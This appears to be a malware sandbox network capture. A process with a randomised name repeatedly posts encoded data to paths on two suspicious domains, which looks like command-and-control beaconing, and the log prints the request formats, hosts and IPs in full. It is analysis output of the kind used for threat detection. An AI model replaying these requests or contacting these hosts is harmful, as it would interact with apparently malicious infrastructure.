Aug 9, 2024 08:42:08.965529919 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 09 Aug 2024 06:42:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.29 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Aug 9, 2024 08:42:08.965735912 CEST	1236	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Aug 9, 2024 08:42:08.965749025 CEST	1236	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Aug 9, 2024 08:42:08.965805054 CEST	1236	IN	Data Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
Aug 9, 2024 08:42:08.965818882 CEST	878	IN	Data Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68 Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49740	23.251.54.212	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:42:14.851496935 CEST	770	OUT	POST /li0t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.anuts.top Origin: http://www.anuts.top Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 212 Referer: http://www.anuts.top/li0t/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 52 58 77 66 4f 63 48 61 39 54 34 4d 70 6e 2f 79 52 51 68 59 6a 4a 62 56 56 49 73 68 33 32 4a 64 46 4f 30 53 53 6d 4e 55 33 75 52 57 53 6e 37 78 33 42 46 69 48 55 6a 50 69 38 6c 34 43 4b 6d 75 66 75 43 70 6b 77 63 2b 67 37 6f 2b 46 65 61 43 76 6f 35 65 76 79 6e 69 55 72 38 54 4d 6a 4a 78 75 42 41 46 70 53 35 45 61 45 56 68 35 7a 43 69 47 38 43 70 46 4b 4c 75 77 54 58 69 36 6b 6c 79 32 4a 4a 4e 33 41 73 53 42 37 67 65 73 31 75 74 70 77 31 35 6b 39 55 47 55 73 35 54 35 59 39 6c 33 76 31 5a 5a 31 2f 35 74 45 6c 46 79 39 46 42 72 42 6c 4d 6b 72 54 4c 2b 64 45 70 41 6b 52 56 66 6e 59 62 4e 65 64 4c 31 64 32 75 Data Ascii: _Z1XhZu=RXwfOcHa9T4Mpn/yRQhYjJbVVIsh32JdFO0SSmNU3uRWSn7x3BFiHUjPi8l4CKmufuCpkwc+g7o+FeaCvo5evyniUr8TMjJxuBAFpS5EaEVh5zCiG8CpFKLuwTXi6kly2JJN3AsSB7ges1utpw15k9UGUs5T5Y9l3v1ZZ1/5tElFy9FBrBlMkrTL+dEpAkRVfnYbNedL1d2u

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49741	23.251.54.212	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:42:17.395926952 CEST	794	OUT	POST /li0t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.anuts.top Origin: http://www.anuts.top Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 236 Referer: http://www.anuts.top/li0t/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 52 58 77 66 4f 63 48 61 39 54 34 4d 6f 48 76 79 58 33 39 59 32 5a 62 57 51 49 73 68 38 57 4a 42 46 4f 34 53 53 6e 4a 69 32 59 42 57 53 47 4c 78 32 44 74 69 41 55 6a 50 73 63 6b 79 63 36 6d 70 66 75 47 68 6b 31 6b 2b 67 37 38 2b 46 61 57 43 76 37 68 52 75 69 6e 67 4d 62 38 64 49 6a 4a 78 75 42 41 46 70 53 38 5a 61 41 78 68 34 44 53 69 46 59 32 75 62 36 4c 70 6d 6a 58 69 70 30 6c 32 32 4a 4a 2f 33 46 49 30 42 39 6b 65 73 77 4b 74 71 68 31 36 2f 4e 55 4d 4b 63 34 6e 33 4c 49 31 31 4e 34 4a 57 32 50 35 31 6e 63 6e 36 72 45 62 33 79 6c 76 32 37 7a 4a 2b 66 63 62 41 45 52 2f 64 6e 67 62 66 4a 52 73 36 70 54 4e 2f 32 42 74 47 4f 4b 5a 46 2b 42 73 50 58 32 30 66 5a 48 31 50 77 3d 3d Data Ascii: _Z1XhZu=RXwfOcHa9T4MoHvyX39Y2ZbWQIsh8WJBFO4SSnJi2YBWSGLx2DtiAUjPsckyc6mpfuGhk1k+g78+FaWCv7hRuingMb8dIjJxuBAFpS8ZaAxh4DSiFY2ub6LpmjXip0l22JJ/3FI0B9keswKtqh16/NUMKc4n3LI11N4JW2P51ncn6rEb3ylv27zJ+fcbAER/dngbfJRs6pTN/2BtGOKZF+BsPX20fZH1Pw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49743	23.251.54.212	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:42:19.966156006 CEST	1807	OUT	POST /li0t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.anuts.top Origin: http://www.anuts.top Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1248 Referer: http://www.anuts.top/li0t/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 52 58 77 66 4f 63 48 61 39 54 34 4d 6f 48 76 79 58 33 39 59 32 5a 62 57 51 49 73 68 38 57 4a 42 46 4f 34 53 53 6e 4a 69 32 59 4a 57 54 30 7a 78 32 6b 5a 69 42 55 6a 50 79 4d 6b 78 63 36 6d 30 66 71 69 6c 6b 31 35 46 67 35 45 2b 45 35 65 43 36 2b 4e 52 67 69 6e 67 51 72 38 51 4d 6a 49 72 75 42 52 43 70 54 4d 5a 61 41 78 68 34 42 61 69 52 38 43 75 5a 36 4c 75 77 54 58 75 36 6b 6c 65 32 4a 52 46 33 46 4d 43 43 4e 45 65 76 51 61 74 6d 33 5a 36 7a 4e 55 4b 4c 63 34 2f 33 4c 56 76 31 4e 6b 46 57 32 4b 63 31 6b 41 6e 35 38 46 54 6a 44 70 75 72 59 50 65 68 74 34 62 4d 42 70 67 58 55 49 72 58 62 74 73 38 72 62 6e 38 67 4e 4d 4d 75 58 41 4f 64 46 36 47 42 6e 36 66 6f 53 68 53 6a 65 79 70 4f 35 39 72 30 35 52 39 64 46 6c 75 37 47 76 67 4e 45 49 66 54 45 6b 4c 6d 46 4c 74 6a 36 51 57 78 38 58 52 76 52 42 6d 62 43 68 77 5a 4c 43 77 75 70 30 63 4a 61 62 78 6d 39 41 4a 41 55 5a 2b 53 35 7a 6c 6e 46 78 6b 6b 65 30 2f 6a 58 63 52 46 78 44 6d 6b 48 78 46 47 6a 4f 68 36 45 68 6a 78 59 77 76 54 [TRUNCATED] Data Ascii: _Z1XhZu=RXwfOcHa9T4MoHvyX39Y2ZbWQIsh8WJBFO4SSnJi2YJWT0zx2kZiBUjPyMkxc6m0fqilk15Fg5E+E5eC6+NRgingQr8QMjIruBRCpTMZaAxh4BaiR8CuZ6LuwTXu6kle2JRF3FMCCNEevQatm3Z6zNUKLc4/3LVv1NkFW2Kc1kAn58FTjDpurYPeht4bMBpgXUIrXbts8rbn8gNMMuXAOdF6GBn6foShSjeypO59r05R9dFlu7GvgNEIfTEkLmFLtj6QWx8XRvRBmbChwZLCwup0cJabxm9AJAUZ+S5zlnFxkke0/jXcRFxDmkHxFGjOh6EhjxYwvTcCREyUodR4aAXKo2vOGGgl5fy7AG8JdWQNuIHVMDXRTu/zUsHJ6nEKv4j2me29/baS9beUi+hqN9i2OALVtGXJ/ieO2LSbClOBHaTcbvsfpXuD8FEHrelQIc9fpT1mltMIIWFOfMANLvb2LUH9qxpn28ViPXoLUM2gJX1P3M/6q7oH6Vd8aZXQi6BC8YczalCKGnltHl869389HGtxpJqmPRX4rdi5c4vBLgCf+mkNuIRtkUj7lVSZEjJRm1Gbyo4PZU1tzNjsIZA7VZ6bwrE2ZCCpzcKhc3llVOzU3GdNA5Ufghfc9XqgYfSx9ODdaRFHz62aFZ/lYZZpajBM7N1RF6DufWBJ9FNL1koXptAArWwFITVZuP/T+WXG9w4EmRqgpbqrUDK1IR/j2gvzjoFhZXJbmyfbmjm7Ac64cc28OTTpWpc7b9PZ271yYLFXBMQstSabFbJIjMzLDjUzu4PQBMZuyJtLn94KjHeRIdnXXV67Ql5vd5RAlpnbA6yg0pWoyeU255jaMduV/9z3NKtMTJIu5vVcjIMt8VuYcUi4Vvfer3QzvqdAbB+6VWxrCRV92deqy/zRpPrTQrZO9NZz+QRNQEFOPRCnMkbqVB7q0cGsltdcIefJ8xNeBS/NQiq7qCbFKx9RSdwTxGi4jsuCi26vKlyWY1Y7 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	49744	23.251.54.212	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:42:22.499869108 CEST	516	OUT	GET /li0t/?f6Gp=VzB4OR5&_Z1XhZu=cVY/NretpRV3pSqbAwFMzZODfIM0+2Z9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfmgzsT+t0YhwbvSsCvQsvRzAE2jG1Yfj5GMuV7i/imjBO2IoEoB4= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.anuts.top Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	49745	199.192.19.19	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:42:49.032668114 CEST	782	OUT	POST /ei85/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.telwisey.info Origin: http://www.telwisey.info Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 212 Referer: http://www.telwisey.info/ei85/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 44 54 4f 4b 63 69 51 79 6d 76 35 42 4b 4a 50 4e 6e 70 4d 64 5a 63 2b 53 48 41 38 54 45 72 72 46 6e 6d 79 64 61 4d 4e 77 72 6f 4d 4a 30 4b 2f 2f 36 51 55 79 54 33 56 46 59 45 69 4b 63 4a 78 32 43 45 2b 6e 30 63 74 73 37 4c 35 70 61 57 32 77 48 76 52 50 6d 53 70 32 43 67 7a 67 76 42 54 6e 6a 31 38 74 4d 6b 6c 48 59 68 64 31 6f 45 47 4d 50 2b 6c 75 74 47 36 4d 49 38 52 47 68 59 42 53 4f 4b 4c 4b 33 51 37 36 66 73 62 35 4d 43 66 57 6e 56 74 6b 33 59 31 79 78 52 58 6c 39 2b 4a 33 34 65 79 61 2b 45 34 54 6c 5a 67 70 39 34 54 46 39 4b 52 41 57 76 34 73 64 69 67 39 78 79 69 38 36 33 77 66 69 43 72 69 4f 47 58 7a Data Ascii: _Z1XhZu=DTOKciQymv5BKJPNnpMdZc+SHA8TErrFnmydaMNwroMJ0K//6QUyT3VFYEiKcJx2CE+n0cts7L5paW2wHvRPmSp2CgzgvBTnj18tMklHYhd1oEGMP+lutG6MI8RGhYBSOKLK3Q76fsb5MCfWnVtk3Y1yxRXl9+J34eya+E4TlZgp94TF9KRAWv4sdig9xyi863wfiCriOGXz
Aug 9, 2024 08:42:49.639075994 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 09 Aug 2024 06:42:49 GMT Server: Apache Content-Length: 16026 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
Aug 9, 2024 08:42:49.639111042 CEST	1236	IN	Data Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37 Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
Aug 9, 2024 08:42:49.639132023 CEST	1236	IN	Data Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
Aug 9, 2024 08:42:49.639166117 CEST	1236	IN	Data Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
Aug 9, 2024 08:42:49.639180899 CEST	896	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" />
Aug 9, 2024 08:42:49.639203072 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="#0E0620" stroke
Aug 9, 2024 08:42:49.639250994 CEST	1236	IN	Data Raw: 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 Data Ascii: </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.952" />
Aug 9, 2024 08:42:49.639271021 CEST	448	IN	Data Raw: 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" /> </g>
Aug 9, 2024 08:42:49.639642954 CEST	1236	IN	Data Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
Aug 9, 2024 08:42:49.640127897 CEST	1236	IN	Data Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74 Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit=
Aug 9, 2024 08:42:49.644522905 CEST	1236	IN	Data Raw: 38 31 37 2d 35 2e 38 31 38 2d 32 2e 34 38 34 2d 39 2e 30 34 36 0a 09 09 09 09 43 33 37 35 2e 36 32 35 2c 34 33 37 2e 33 35 35 2c 33 38 33 2e 30 38 37 2c 34 33 37 2e 39 37 33 2c 33 38 38 2e 37 36 32 2c 34 33 34 2e 36 37 37 7a 22 20 2f 3e 0a 20 20 Data Ascii: 817-5.818-2.484-9.046C375.625,437.355,383.087,437.973,388.762,434.677z" /> </g> <g id="armL"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="roun

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	49746	199.192.19.19	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:42:51.815893888 CEST	806	OUT	POST /ei85/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.telwisey.info Origin: http://www.telwisey.info Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 236 Referer: http://www.telwisey.info/ei85/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 44 54 4f 4b 63 69 51 79 6d 76 35 42 59 35 66 4e 68 49 4d 64 4d 73 2b 56 61 77 38 54 57 72 72 42 6e 68 36 64 61 4e 5a 67 72 64 63 4a 30 75 7a 2f 37 52 55 79 65 58 56 46 41 55 69 44 59 4a 78 39 43 45 79 56 30 5a 56 73 37 50 70 70 61 54 4b 77 45 63 35 4d 6b 43 70 4f 4a 41 7a 75 67 68 54 6e 6a 31 38 74 4d 67 30 71 59 68 31 31 70 78 4f 4d 4f 61 35 70 7a 32 36 50 66 4d 52 47 6c 59 42 57 4f 4b 4b 64 33 52 6e 51 66 76 6a 35 4d 43 76 57 6e 41 5a 6c 75 6f 30 35 76 68 57 4c 35 72 55 69 69 74 50 5a 67 6b 77 6b 77 35 41 4d 31 75 53 66 68 35 52 6a 45 2f 59 75 64 67 34 50 78 53 69 57 34 33 49 66 77 56 6e 46 42 79 79 51 7a 44 57 50 4d 6e 70 4c 45 58 56 70 54 37 35 6c 31 7a 6c 72 